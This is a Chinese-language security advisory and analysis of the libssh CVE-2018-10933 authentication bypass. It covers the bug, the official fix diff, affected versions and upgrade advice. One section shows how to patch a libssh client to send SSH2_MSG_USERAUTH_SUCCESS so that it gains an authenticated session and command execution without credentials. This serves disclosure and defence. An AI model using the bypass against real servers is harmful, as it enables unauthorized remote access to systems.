libssh CVE-2018-10933 身份驗證繞過漏洞分析報告
責編:gltian |2018-10-18 11:08:320x00 事件背景
2018-10-16 libssh發布更新公告旨在解決CVE-2018-10933的問題
libssh版本0.6及更高版本在服務端代碼中具有身份驗證繞過漏洞。 通過向服務端提供SSH2_MSG_USERAUTH_SUCCESS消息來代替服務端期望啟動身份驗證的 SSH2_MSG_USERAUTH_REQUEST消息,攻擊者可以在沒有任何憑據的情況下成功進行身份驗證。 進而可以進行一些惡意操作。
0x01 詳情分析
在libssh的example中已經存在一些server端的例子,測試環境則采用這些例子進行說明
這個漏洞能用,但目前就分析而言發現,無法很好的泛用,所以建議及時進行更新以免遭受影響
在libssh中以session的方式對會話進行處理,無論是server的建立還是client的連接。
均以
session = ssh_new();進行session建立
因為這個漏洞是直接獲得AUTH所以服務端的配置和客戶端的連接認證方式等完全不用在意
簡單的client連接示例的部分代碼,以體現邏輯為主。
首先是設置一些參數,然后利用session進行連接
然后進行knownhost認證處理,這步就是平時在進行ssh連接的時候進行提醒的是否要保存信 息
if (ssh_options_set(session, SSH_OPTIONS_HOST ,host) < 0)
return -1;
if(ssh_connect(session)){
fprintf(stderr,"Connection failed : %s\n",ssh_get_error(session));
return -1;
}
state=verify_knownhost(session);
if (state != 0)
return -1;
auth=authenticate_console(session);
if(auth != SSH_AUTH_SUCCESS){
return -1;
}authenticate_console(session)
的流程為先發送一個ssh_userauth_none再根據選擇的AUTH方式,嘗試GSSAPI、PublicKey、 Password的方式
這里采用的patch掉client中發送密碼認證的時候的數據包
將第二行的SSH2_MSG_USERAUTH_REQUEST?->?SSH2_MSG_USERAUTH_SUCCESS
rc = ssh_buffer_pack(session->out_buffer, "bsssbs",
SSH2_MSG_USERAUTH_SUCCESS,
username ? username : session->opts.username,
"ssh-connection",
"password",
0, /* false */
password
);并且需要在ssh_userauth_get_response之前直接返回,因為這一步會再次向服務端進行通 信,但此時受影響版本的server已經Authentication successful
這時候的session就已經可以獲得相應的權限了。通過官方的Tutorial的執行命令的例子調 用ssh_channel_request_exec進行命令執行
0x02 修復分析
官方通過增加字段,并注冊額外的session狀態校驗函數進行檢驗,在處理流程中標注 session處于的狀態,避免client隨意發送SSH2_MSG_USERAUTH_SUCCESS進行bypass
+static enum ssh_packet_filter_result_e ssh_packet_incoming_filter(ssh_session session)
+ case SSH2_MSG_USERAUTH_SUCCESS: // 52
+ if ((session->auth_state != SSH_AUTH_STATE_KBDINT_SENT) &&
+ (session->auth_state != SSH_AUTH_STATE_PUBKEY_AUTH_SENT) &&
+ (session->auth_state != SSH_AUTH_STATE_PASSWORD_AUTH_SENT) &&
+ (session->auth_state != SSH_AUTH_STATE_GSSAPI_MIC_SENT) &&
+ (session->auth_state != SSH_AUTH_STATE_AUTH_NONE_SENT))
+ {
+ rc = SSH_PACKET_DENIED;
+ break;
+ }該校驗函數判斷session的狀態是否處于?SSH_AUTH_STATE_PUBKEY_AUTH_SENT,SSH_AUTH_STATE_PASSWORD_AUTH_SENT,
SSH_AUTH_STATE_NONE_SENT這些個狀態 來確認是否要接受數據包里帶有SSH2_MSG_USERAUTH_SUCCESS的情況
@@ -88,6 +88,7 @@ static int ssh_auth_response_termination(void *user){
case SSH_AUTH_STATE_PUBKEY_AUTH_SENT:
case SSH_AUTH_STATE_PUBKEY_OFFER_SENT:
case SSH_AUTH_STATE_PASSWORD_AUTH_SENT:
+ case SSH_AUTH_STATE_AUTH_NONE_SENT:
return 0;
default:
return 1;
@@ -143,6 +144,7 @@ static int ssh_userauth_get_response(ssh_session session) {
case SSH_AUTH_STATE_PUBKEY_OFFER_SENT:
case SSH_AUTH_STATE_PUBKEY_AUTH_SENT:
case SSH_AUTH_STATE_PASSWORD_AUTH_SENT:
+ case SSH_AUTH_STATE_AUTH_NONE_SENT:
case SSH_AUTH_STATE_NONE:
/* not reached */
rc = SSH_AUTH_ERROR;同時在每次的response校驗中增加該字段,如果該字段存在就直接返回error
0x03 驗證截圖
執行命令
獲得shell
0x04 影響范圍
libssh0.6以上的版本
目前各大發行版中部分已經對相應package進行更新,但還未完全進行版本迭代,具體情況可以關注一下鏈接
Debain
https://security-tracker.debian.org/tracker/CVE-2018-10933
ubuntu
https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-10933.html
opensuse
https://www.suse.com/security/cve/CVE-2018-10933/
redhat
https://access.redhat.com/security/cve/cve-2018-10933
通過360CERT Quake資產檢索平臺發現共計3,170臺設備開放libssh服務在外網,但并非所有的libssh服務均處于受影響的版本范圍。該漏洞影響范圍有限。
0x05 修復建議
及時對服務端libssh版本進行更新
可以在如下網址下載最新的0.7.6以及0.8.4版本
https://red.libssh.org/projects/libssh/files
或者在如下地址尋找對應版本的patch文件
https://www.libssh.org/security/
0x06 時間線
2018-10-16?libssh 官方發布重要更新
2018-10-16?360CERT發布預警報告
2018-10-17?360CERT發布分析報告
0x07 參考鏈接
原文鏈接:https://www.anquanke.com/post/id/162225